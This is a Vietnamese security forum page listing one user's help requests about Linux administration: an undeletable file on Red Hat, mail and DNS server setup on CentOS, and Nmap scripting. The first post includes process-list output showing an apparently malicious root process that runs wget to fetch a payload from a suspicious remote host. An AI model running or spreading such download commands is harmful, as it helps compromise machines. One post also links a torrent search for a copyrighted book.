banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: V.I.C  XML
Profile for V.I.C Messages posted by V.I.C [ number of posts not being displayed on this page: 0 ]
 
Em gặp phải 1 vấn đề khi xóa file trên Redhat như sau:
[root@sapsol etc]# rm -rf sfewfesfs
rm: cannot remove `sfewfesfs': Operation not permitted
sau đó em đã thử thêm cách:
[root@sapsol etc]# lsattr password
[root@sapsol etc]# chattr -ai password
Mà vẫn không xóa được file đó
Process nó vẫn chạy : ps -aux | grep sfewfesfsh
root 3665 3555 0 08:00 ? 00:00:00 wget http://www.dgnfd564sdf.com:8080/sfewfesfs
root 3734 1 0 08:00 ? 00:00:00 /etc/sfewfesfsh
root 14284 7426 0 08:24 pts/2 00:00:00 grep sfewfesfs

Các anh đề xuất cao kiến giúp em ?
Em cảm ơn.
Uk đúng rồi, mình cũng tìm đến trang này, nhưng tải về không được.?
Em đang tìm cuốn sách " Linux Command Line" . Các anh ai có cuốn sách đó share cho em với..
Em cảm ơn !
Các anh cho em hỏi: Em đã thực hiện cài đặt xong iRedMail trẻ máy ảo CentOS 6.3 ( Ip: 192.168.8.134)
sau khi cài đặt xong em ra máy thật thực hiện truy cập vào mail Server theo đường dẫn
http://192.168.8.134/webmail/
thì báo lỗi ERROR : the resquest URL could not be retrived
các anh chỉ dùm em cách sửa
Em đang tìm hiểu firewalk.nse (trong phần Nmap Scripting Engine) của công cụ Nmap, ai chỉ giúp em cơ chế hoạt động của firewalk.nse này hoạt động như thế nào với
code: http://nmap.org/nsedoc/scripts/firewalk.html
em đang tìm hiểu về công cụ NMAP...về những tính năng của công cụ này hỗ trợ cho việc quản lý mạng.
các anh giải thích dùm em về tính năng " khám phá cấu trúc mạng của NMAP" với ?
sao em nhập mật khẩu longbaoitc không được nhỉ?
em đang đọc trên http://nmap.org/book/nse-script-format.html#nse-format-rules
ai giải thích dùm em đoạn code này với:
Code:
action = function(host, port)
local owner = ""
local client_ident = nmap.new_socket()
local client_service = nmap.new_socket()
local catch = function()
client_ident:close()
client_service:close()
end
local try = nmap.new_try(catch)
try(client_ident:connect(host.ip, 113))
try(client_service:connect(host.ip, port.number))
local localip, localport, remoteip, remoteport =
try(client_service:get_info())
local request = port.number .. ", " .. localport .. "\r\n"
try(client_ident:send(request))
owner = try(client_ident:receive_lines(1))
if string.match(owner, "ERROR") then
owner = nil
else
owner = string.match(owner,
"%d+%s*,%s*%d+%s*:%s*USERID%s*:%s*.+%s*:%s*(.+)\r?\n")
end
try(client_ident:close())
try(client_service:close())
return owner
end
em đọc tài liệu và không hiểu lắm về những khái niệm sau:
prerule ()
hostrule (host)
portrule (host, port)
postrule ()

các anh chị chỉ giúp em 1 chút về 4 cái đó...

---

Nên nói rõ là mình đang đọc tài liệu về vấn đề gì hoặc ít nhất cũng chèn link tài liệu mình đang đọc vào đây.

http://nmap.org/book/nse-script-format.html#nse-format-rules
em rất cần cuốn tài liệu Nmap Network scanning của Gordon Fyodor Lyon.ao có cho em xin tài liệu này được không. em kiếm trên mạng có duy nhất 1 chỗ có,,,nhưng không tải được.
http://torrentz.eu/nm/nmap+network+scanning+pdf-q

ai giúp em tải tài liệu này với, hoặc có rồi cho em xem với...
em cảm ơn rất nhiều
code như sau
Code:
[root@vic Desktop]# rpm -ivh /media/CentOS_6.3_Final/Packages/bind-
bind-9.8.2-0.10.rc1.el6.i686.rpm
bind-chroot-9.8.2-0.10.rc1.el6.i686.rpm
bind-dyndb-ldap-1.1.0-0.9.b1.el6.i686.rpm
bind-libs-9.8.2-0.10.rc1.el6.i686.rpm
bind-utils-9.8.2-0.10.rc1.el6.i686.rpm
[root@vic Desktop]# rpm -ivh /media/CentOS_6.3_Final/Packages/bind-dyndb-ldap-1.1.0-0.9.b1.el6.i686.rpm
error: Failed dependencies:
bind >= 32:9.6.1-0.3.b1 is needed by bind-dyndb-ldap-1.1.0-0.9.b1.el6.i686
[root@vic Desktop]# rpm -ivh /media/CentOS_6.3_Final/Packages/bind-9.8.2-0.10.rc1.el6.i686.rpm
error: Failed dependencies:
bind-libs = 32:9.8.2-0.10.rc1.el6 is needed by bind-32:9.8.2-0.10.rc1.el6.i686
[root@vic Desktop]# rpm -ivh /media/CentOS_6.3_Final/Packages/bind-libs-9.8.2-0.10.rc1.el6.i686.rpm
Preparing... ########################################### [100%]
package bind-libs-32:9.8.2-0.10.rc1.el6_3.5.i686 (which is newer than bind-libs-32:9.8.2-0.10.rc1.el6.i686) is already installed
file /usr/lib/libbind9.so.80.0.4 from install of bind-libs-32:9.8.2-0.10.rc1.el6.i686 conflicts with file from package bind-libs-32:9.8.2-0.10.rc1.el6_3.5.i686
file /usr/lib/libdns.so.81.4.1 from install of bind-libs-32:9.8.2-0.10.rc1.el6.i686 conflicts with file from package bind-libs-32:9.8.2-0.10.rc1.el6_3.5.i686
file /usr/lib/libisc.so.83.0.3 from install of bind-libs-32:9.8.2-0.10.rc1.el6.i686 conflicts with file from package bind-libs-32:9.8.2-0.10.rc1.el6_3.5.i686
file /usr/lib/libisccc.so.80.0.0 from install of bind-libs-32:9.8.2-0.10.rc1.el6.i686 conflicts with file from package bind-libs-32:9.8.2-0.10.rc1.el6_3.5.i686
file /usr/lib/libisccfg.so.82.0.1 from install of bind-libs-32:9.8.2-0.10.rc1.el6.i686 conflicts with file from package bind-libs-32:9.8.2-0.10.rc1.el6_3.5.i686
file /usr/lib/liblwres.so.80.0.2 from install of bind-libs-32:9.8.2-0.10.rc1.el6.i686 conflicts with file from package bind-libs-32:9.8.2-0.10.rc1.el6_3.5.i686
[root@vic Desktop]#

em đang cài đặt dịch vụ DNS trên CentOs 6.3 nhưng gặp 1 lỗi sau:
error: Failed dependencies
..chưa biết sửa như thế nào.các anh chỉ dùm em cách sửa lỗi trên
em cảm ơn
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|